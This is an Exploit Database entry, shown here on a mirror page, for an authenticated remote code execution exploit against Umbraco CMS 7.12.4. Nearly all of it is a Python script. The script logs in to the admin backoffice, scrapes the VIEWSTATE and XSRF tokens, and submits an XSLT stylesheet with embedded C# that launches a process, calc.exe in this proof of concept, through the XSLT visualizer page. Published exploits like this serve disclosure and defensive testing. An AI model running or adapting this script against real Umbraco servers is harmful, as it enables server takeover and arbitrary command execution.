Umbraco CMS 7.12.4 – (Authenticated) Remote Code Execution

• Exploit Database
• 38 阅读

• 作者： Gregory Draperi
  日期： 2019-01-14
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/46153/

• # Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
  # Dork: N/A
  # Date: 2019-01-13
  # Exploit Author: Gregory DRAPERI & Hugo BOUTINON
  # Vendor Homepage: http://www.umbraco.com/
  # Software Link: https://our.umbraco.com/download/releases
  # Version: 7.12.4
  # Category: Webapps
  # Tested on: Windows IIS
  # CVE: N/A
  
  
  import requests;
  
  from bs4 import BeautifulSoup;
  
  def print_dict(dico):
  print(dico.items());
  
  print("Start");
  
  # Execute a calc for the PoC
  payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
  xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
  <msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
  { string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
   proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\
   proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
   proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
   </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
   </xsl:template> </xsl:stylesheet> ';
  
  login = "XXXX;
  password="XXXX";
  host = "XXXX";
  
  # Step 1 - Get Main page
  s = requests.session()
  url_main =host+"/umbraco/";
  r1 = s.get(url_main);
  print_dict(r1.cookies);
  
  # Step 2 - Process Login
  url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
  loginfo = {"username":login,"password":password};
  r2 = s.post(url_login,json=loginfo);
  
  # Step 3 - Go to vulnerable web page
  url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
  r3 = s.get(url_xslt);
  
  soup = BeautifulSoup(r3.text, 'html.parser');
  VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
  VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
  UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
  headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
  data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
  
  # Step 4 - Launch the attack
  r4 = s.post(url_xslt,data=data,headers=headers);
  
  print("End");